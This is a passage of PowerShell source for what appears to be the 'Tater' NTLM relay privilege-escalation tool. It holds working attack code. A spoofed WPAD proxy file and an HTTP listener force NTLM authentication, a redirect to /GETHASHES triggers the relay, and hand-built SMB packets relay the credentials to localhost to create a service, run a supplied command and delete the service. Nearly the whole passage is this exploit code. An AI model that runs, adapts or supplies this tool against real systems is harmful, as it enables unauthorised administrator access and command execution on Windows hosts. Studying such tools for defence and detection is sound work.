                    [Byte[]] $SMB_relay_execute_send = (0x00,0x00,0x00,0x9b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
                        + $tater.process_ID_bytes`
                        + $SMB_user_ID`
                        + (0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00,0x50)`
                        + (0x00,0x00,0x00,0x5c,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,0x00)`
                        + (0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00,0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03)`
                        + (0x00,0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00)`
                        + $SMB_service_bytes`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00)
                        
                        $SMB_multiplex_id = (0x07)
                }
                
                5 {  
                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
                }
                
                6 {
                    [Byte[]]$SMB_relay_execute_send = [ARRAY](0x00)`
                        + $SMB_service_data_length_bytes`
                        + (0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
                        + $tater.process_ID_bytes`
                        + $SMB_user_ID`
                        + (0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00)`
                        + $SMB_service_byte_count_bytes`
                        + (0x00,0x00)`
                        + $SMB_service_byte_count_bytes`
                        + (0x3f,0x00,0x00,0x00,0x00,0x00)`
                        + $SMB_service_byte_count_bytes`
                        + (0x05,0x00,0x00,0x03,0x10)`
                        + (0x00,0x00,0x00)`
                        + $SMB_service_byte_count_bytes`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c,0x00)`
                        + $SMB_context_handler`
                        + (0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00)`
                        + $SMB_service_bytes`
                        + (0x00,0x00)`
                        + $SMB_referent_ID_bytes`
                        + (0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00)`
                        + $SMB_service_bytes`
                        + (0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)`
                        + $SMB_relay_command_length_bytes`
                        + (0x00,0x00,0x00,0x00)`
                        + $SMB_relay_command_length_bytes`
                        + $SMB_relay_command_bytes`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)
                        
                        $SMB_multiplex_id = (0x09)
                }

                7 {
                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
                }

                
                8 {
                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x73,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
                        + $tater.process_ID_bytes`
                        + $SMB_user_ID`
                        + (0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00,0x34)`
                        + (0x00,0x00,0x00,0x34,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00,0x00)`
                        + (0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x13,0x00)`
                        + $SMB_context_handler`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)
                }
                
                9 {
                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
                }
                
                10 { 
                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x6b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
                        + $tater.process_ID_bytes`
                        + $SMB_user_ID`
                        + (0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00,0x2c)`
                        + (0x00,0x00,0x00,0x2c,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,0x00)`
                        + (0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x02,0x00)`
                        + $SMB_context_handler
                }
                11 {
                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
                }
            }
            
            $SMB_relay_execute_stream.write($SMB_relay_execute_send, 0, $SMB_relay_execute_send.length)
            $SMB_relay_execute_stream.Flush()
            
            if ($k -eq 5) 
            {
                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes, 0, $SMB_relay_execute_bytes.length)
                $SMB_context_handler = $SMB_relay_execute_bytes[88..107]

                if(([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '00-00-00-00') -and ([System.BitConverter]::ToString($SMB_context_handler) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00'))
                {
                    #$tater.console_queue.add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")
                }
                elseif([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '05-00-00-00')
                {
                    $tater.console_queue.add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $SMBRelayTarget")
                    $SMB_relay_failed = $true
                }
                else
                {
                    $SMB_relay_failed = $true
                }

            }
            elseif (($k -eq 7) -or ($k -eq 9) -or ($k -eq 11))
            {
                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes, 0, $SMB_relay_execute_bytes.length)

                switch($k)
                {
                    7 {
                        $SMB_context_handler = $SMB_relay_execute_bytes[92..111]
                        $SMB_relay_execute_error_message = "Service creation fault context mismatch"
                    }
                    11 {
                        $SMB_relay_execute_error_message = "Service start fault context mismatch"
                    }
                    13 {
                        $SMB_relay_execute_error_message = "Service deletion fault context mismatch"
                    }
                }
                
                if([System.BitConverter]::ToString($SMB_context_handler[0..3]) -ne '00-00-00-00')
                {
                    $SMB_relay_failed = $true
                }

                if([System.BitConverter]::ToString($SMB_relay_execute_bytes[88..91]) -eq '1a-00-00-1c')
                {
                    $tater.console_queue.add("$SMB_relay_execute_error_message service on $SMBRelayTarget")
                    $SMB_relay_failed = $true
                }
            }        
            else
            {
                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes, 0, $SMB_relay_execute_bytes.length)    
            }
            
            if((!$SMB_relay_failed) -and ($k -eq 7))
            {
                $tater.console_queue.add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $SMBRelayTarget")
            }
            elseif((!$SMB_relay_failed) -and ($k -eq 9))
            {
                $tater.console_queue.add("$(Get-Date -format 's') - Command likely executed on $SMBRelayTarget")
                $tater.SMB_relay = $false
            }
            elseif((!$SMB_relay_failed) -and ($k -eq 11))
            {
                $tater.console_queue.add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $SMBRelayTarget")
                }   
            
            [Byte[]]$SMB_relay_execute_ReadAndRequest = (0x00,0x00,0x00,0x37,0xff,0x53,0x4d,0x42,0x2e,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
                + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
                + $tater.process_ID_bytes`
                + $SMB_user_ID`
                + $SMB_multiplex_ID`
                + (0x00,0x0a,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x58,0x02,0x58,0x02,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00)
            
            if($SMB_relay_failed)
            {
                $tater.console_queue.add("$(Get-Date -format 's') - SMB relay failed on $SMBRelayTarget")
                BREAK SMB_relay_execute_loop
            }

            $k++
        }
        
        $tater.SMB_relay_active_step = 0
        
        $SMB_relay_socket.Close()

        if(!$SMB_relay_failed)
        {
            $tater.SMBRelay_success = $True
        }
    }
}

# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener
$HTTP_scriptblock = 
{ 
    param ($Command,$HTTPPort,$WPADDirectHosts,$WPADPort)

    Function NTLMChallengeBase64
    {

        $HTTP_timestamp = Get-Date
        $HTTP_timestamp = $HTTP_timestamp.ToFileTime()
        $HTTP_timestamp = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_timestamp))
        $HTTP_timestamp = $HTTP_timestamp.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}

        [byte[]]$HTTP_NTLM_bytes = (0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,0x00,0x00,0x00,0x05,0xc2,0x89,0xa2)`
            + $HTTP_challenge_bytes`
            + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00)`
            + (0x02,0x00,0x06,0x00,0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00)`
            + (0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,0x00,0x68,0x00,0x6f,0x00)`
            + (0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00)`
            + (0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00)`
            + $HTTP_timestamp`
            + (0x00,0x00,0x00,0x00,0x0a,0x0a)

        $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
        $NTLM = 'NTLM ' + $NTLM_challenge_base64
        $NTLM_challenge = $HTTP_challenge

        Return $NTLM

    }

    $SMBRelayTarget = "127.0.0.1"

    $HTTP_port_bytes = [System.Text.Encoding]::ASCII.GetBytes($HTTPPort)
    
    $WPADDirectHosts += "localhost"

    $HTTP_content_length = $WPADPort.length + 62

    foreach($WPAD_direct_host in $WPADDirectHosts)
    {
        $HTTP_content_length += $WPAD_direct_host.length + 43
        $HTTP_content_length_bytes = [System.Text.Encoding]::ASCII.GetBytes($HTTP_content_length)
        $WPAD_direct_host_bytes = [System.Text.Encoding]::ASCII.GetBytes($WPAD_direct_host)
        $WPAD_direct_host_function_bytes = (0x69,0x66,0x20,0x28,0x64,0x6e,0x73,0x44,0x6f,0x6d,0x61,0x69,0x6e,0x49,0x73,0x28,0x68,0x6f,0x73,0x74,0x2c,0x20,0x22)`
            + $WPAD_direct_host_bytes`
            +(0x22,0x29,0x29,0x20,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x22,0x44,0x49,0x52,0x45,0x43,0x54,0x22,0x3b)
        $WPAD_direct_hosts_bytes += $WPAD_direct_host_function_bytes
    }

    $WPAD_port_bytes = [System.Text.Encoding]::ASCII.GetBytes($WPADPort)
    
    :HTTP_listener_loop while ($tater.running)
    {
        if($tater.SMBRelay_success)
        {
            HTTPListenerStop
        }

        $TCP_request = $NULL
        $TCP_request_bytes = New-Object System.Byte[] 1024

        $suppress_waiting_message = $false

        while(!$tater.HTTP_listener.Pending() -and !$tater.HTTP_client.Connected)
        {
            if(!$suppress_waiting_message)
            {
                $tater.console_queue.add("$(Get-Date -format 's') - Waiting for incoming HTTP connection")
                $suppress_waiting_message = $true
            }
            Start-Sleep -s 1

            if($tater.SMBRelay_success)
            {
                HTTPListenerStop
            }
        }

        if(!$tater.HTTP_client.Connected)
        {
            $tater.HTTP_client = $tater.HTTP_listener.AcceptTcpClient() # will block here until connection 
	        $HTTP_stream = $tater.HTTP_client.GetStream() 
        }

        while ($HTTP_stream.DataAvailable)
        {
            $HTTP_stream.Read($TCP_request_bytes, 0, $TCP_request_bytes.Length)
        }

        $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)

        if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*")
        {
            $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
            $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
            $tater.request_RawUrl = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
        
            if($tater.request_RawUrl -eq "")
            {
                $tater.request_RawUrl = "/"
            }
        }

        if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
        {
            $HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
            $HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-"))
            $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
            $authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length)
        }
        else
        {
            $authentication_header =  ''
        }

        $HTTP_type = "HTTP"

        $HTTP_request_type = ""
        
        if ($tater.request_RawUrl -match '/wpad.dat')
        {
            $tater.response_StatusCode = (0x32,0x30,0x30)
            $HTTP_response_phrase = (0x4f,0x4b)
            $HTTP_WPAD_response = (0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x46,0x69,0x6e,0x64,0x50,0x72,0x6f,0x78,0x79,0x46,0x6f,0x72,0x55,0x52,0x4c,0x28)`
                + (0x75,0x72,0x6c,0x2c,0x68,0x6f,0x73,0x74,0x29,0x7b)`
                + $WPAD_direct_hosts_bytes`
                + (0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x22,0x50,0x52,0x4f,0x58,0x59,0x20,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a)`
                + $WPAD_port_bytes`
                + (0x22,0x3b,0x7d)

            $NTLM = ''
            $HTTP_request_type = "WPAD"
        }
        elseif ($tater.request_RawUrl -eq '/GETHASHES')
        {
            $tater.response_StatusCode = (0x34,0x30,0x31)
            $HTTP_response_phrase = (0x4f,0x4b)
            $NTLM = 'NTLM'
            $HTTP_request_type = "NTLM"
        }
        else
        {
            $tater.response_StatusCode = (0x33,0x30,0x32)
            $HTTP_location = (0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,0x20,0x70,0x72,0x69,0x76,0x61,0x74,0x65,0x0d,0x0a,0x43,0x6f)`
                + (0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73)`
                + (0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x45,0x78,0x70,0x69,0x72,0x65,0x73,0x3a,0x20,0x4d,0x6f,0x6e,0x2c,0x20,0x30,0x31,0x20,0x4a)`
                + (0x61,0x6e,0x20,0x30,0x30,0x30,0x31,0x20,0x30,0x30,0x3a,0x30,0x30,0x3a,0x30,0x30,0x20,0x47,0x4d,0x54,0x0d,0x0a,0x4c,0x6f,0x63,0x61,0x74,0x69)`
                + (0x6f,0x6e,0x3a,0x20,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x6c,0x6f,0x63,0x61,0x6c,0x68,0x6f,0x73,0x74,0x3a)`
                + $HTTP_port_bytes`
                + (0x2f,0x47,0x45,0x54,0x48,0x41,0x53,0x48,0x45,0x53,0x0d,0x0a)

            $HTTP_response_phrase = (0x4f,0x4b)
            $NTLM = ''
            $HTTP_request_type = "Redirect"

            if($tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle)
            {
                $tater.console_queue.add("$(Get-Date -format 's') - Attempting to redirect to http://localhost:$HTTPPort/gethashes and trigger relay")
            }
        }

        if(($tater.request_RawUrl_old -ne $tater.request_RawUrl -and $tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle) -or $tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle)
        {
            $tater.console_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $tater.request_RawUrl + " received from " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
        }

        if($authentication_header.startswith('NTLM '))
        {
            $authentication_header = $authentication_header -replace 'NTLM ',''
            [byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
            $tater.response_StatusCode = (0x34,0x30,0x31)
            $HTTP_response_phrase = (0x4f,0x4b)
            
            if ($HTTP_request_bytes[8] -eq 1)
            {

                if($tater.SMB_relay -and $tater.SMB_relay_active_step -eq 0)
                {
                    $tater.SMB_relay_active_step = 1
                    $tater.console_queue.add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
                    $tater.console_queue.add("$(Get-Date -format 's') - Grabbing challenge for relay from $SMBRelayTarget")
                    $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
                    $SMB_relay_socket.connect($SMBRelayTarget,"445")
                    
                    if(!$SMB_relay_socket.connected)
                    {
                        $tater.console_queue.add("$(Get-Date -format 's') - SMB relay target is not responding")
                        $tater.SMB_relay_active_step = 0
                    }
                    
                    if($tater.SMB_relay_active_step -eq 1)
                    {
                        $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes
                        $tater.SMB_relay_active_step = 2
                        $SMB_relay_bytes = $SMB_relay_bytes[2..$SMB_relay_bytes.length]
                        $SMB_user_ID = $SMB_relay_bytes[34..33]
                        $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes)
                        $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-",""
                        $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000")
                        $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2
                        $SMB_domain_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes
                        $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)]
                        $SMB_target_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes
                        $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)]
                        $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)]
                        $SMB_reserved = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 32)..($SMB_relay_NTLMSSP_bytes_index + 39)]
                        $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
                    
                        [byte[]] $HTTP_NTLM_bytes = (0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00)`
                            + $SMB_domain_length_offset_bytes`
                            + (0x05,0xc2,0x89,0xa2)`
                            + $SMB_relay_NTLM_challenge`
                            + $SMB_reserved`
                            + $SMB_target_length_offset_bytes`
                            + $SMB_relay_target_details
                    
                        $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
                        $NTLM = 'NTLM ' + $NTLM_challenge_base64
                        $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
                        $tater.HTTP_challenge_queue.Add($tater.HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $tater.HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge)
                        $tater.console_queue.add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $SMBRelayTarget")
                        $tater.console_queue.add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
                        $tater.SMB_relay_active_step = 3
                    }
                    else
                    {
                        $NTLM = NTLMChallengeBase64
                    }
                }
                else
                {
                     $NTLM = NTLMChallengeBase64
                }
                
                $tater.response_StatusCode = (0x34,0x30,0x31)
                $HTTP_response_phrase = (0x4f,0x4b)
                
            }
            elseif ($HTTP_request_bytes[8] -eq 3)
            {
                $NTLM = 'NTLM'
                $HTTP_NTLM_offset = $HTTP_request_bytes[24]
                $HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes
                $HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes
                $HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes
                       
                if($HTTP_NTLM_domain_length -eq 0)
                {
                    $HTTP_NTLM_domain_string = ''
                }
                else
                {  
                    $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_length 0 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes
                }

                $HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes
                $HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes

                if ([System.BitConverter]::ToString($HTTP_request_bytes[16]) -eq '58' -and [System.BitConverter]::ToString($HTTP_request_bytes[24]) -eq '58' -and [System.BitConverter]::ToString($HTTP_request_bytes[32]) -eq '58')
                {
                    $HTTP_NTLM_user_string = ''
                    $HTTP_NTLM_host_string = ''
                }
                else
                {
                    $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes
                    $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes
                }

                $NTLM_type = "NTLMv2"           
                $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
                $NTLM_response = $NTLM_response.Insert(32,':')
                
                $tater.response_StatusCode = (0x32,0x30,0x30)
                $HTTP_response_phrase = (0x4f,0x4b)
                $NTLM_challenge = ''
                
                if (($tater.SMB_relay) -and ($tater.SMB_relay_active_step -eq 3))
                {
                    $tater.console_queue.add("$(Get-Date -format 's') - Sending response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")
                    $SMB_relay_response_return_bytes = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_user_ID
                    $SMB_relay_response_return_bytes = $SMB_relay_response_return_bytes[1..$SMB_relay_response_return_bytes.length]
                    
                    if((!$SMB_relay_failed) -and ([System.BitConverter]::ToString($SMB_relay_response_return_bytes[9..12]) -eq ('00-00-00-00')))
                    {
                        $tater.console_queue.add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
                        $tater.SMB_relay_active_step = 4
                        SMBRelayExecute $SMB_relay_socket $SMB_user_ID          
                    }
                    else
                    {
                        $tater.console_queue.add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
                        $tater.SMB_relay_active_step = 0
                        $SMB_relay_socket.Close()
                    }
                }
            }
            else
            {
                $NTLM = 'NTLM'
            }    
        }

        $HTTP_timestamp = Get-Date -format r
        $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
        
        $HTTP_WWW_authenticate_header = (0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20)

        if($NTLM)
        {
            $NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
            [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`
                + $tater.response_StatusCode`
                + (0x20)`
                + $HTTP_response_phrase`
                + (0x0d,0x0a)`
                + (0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,0x20,0x70,0x72,0x69,0x76,0x61,0x74,0x65,0x0d,0x0a)`
                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a)`
                + (0x45,0x78,0x70,0x69,0x72,0x65,0x73,0x3a,0x20,0x4d,0x6f,0x6e,0x2c,0x20,0x30,0x31,0x20,0x4a,0x61,0x6e,0x20,0x30,0x30,0x30,0x31,0x20,0x30,0x30,0x3a,0x30,0x30,0x3a,0x30,0x30,0x20,0x47,0x4d,0x54,0x0d,0x0a)`
                + $HTTP_WWW_authenticate_header`
                + $NTLM`
                + (0x0d,0x0a)`
                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x30,0x0d,0x0a)`
                + (0x0d,0x0a)
        }
        elseif($HTTP_request_type -eq 'WPAD')
        {
            [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`
                + $tater.response_StatusCode`
                + (0x20)`
                + $HTTP_response_phrase`
                + (0x0d,0x0a)`
                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a)`
                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20)`
                + $HTTP_content_length_bytes`
                + (0x0d,0x0a)`
                + (0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a)`
                + (0x44,0x61,0x74,0x65,0x3a)`
                + $HTTP_timestamp`
                + (0x0d,0x0a,0x0d,0x0a)`
                + $HTTP_WPAD_response 
        }
        elseif($HTTP_request_type -eq 'Redirect')
        {
            [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`
                + $tater.response_StatusCode`
                + (0x20)`
                + $HTTP_response_phrase`
                + (0x0d,0x0a)`
                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x30,0x0d,0x0a)`
                + (0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a)`
                + $HTTP_location`
                + (0x44,0x61,0x74,0x65,0x3a)`
                + $HTTP_timestamp`
                + (0x0d,0x0a,0x0d,0x0a)
        }
        else
        {
            [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x20)`
                + $tater.response_StatusCode`
                + (0x20)`
                + $HTTP_response_phrase`
                + (0x0d,0x0a)`
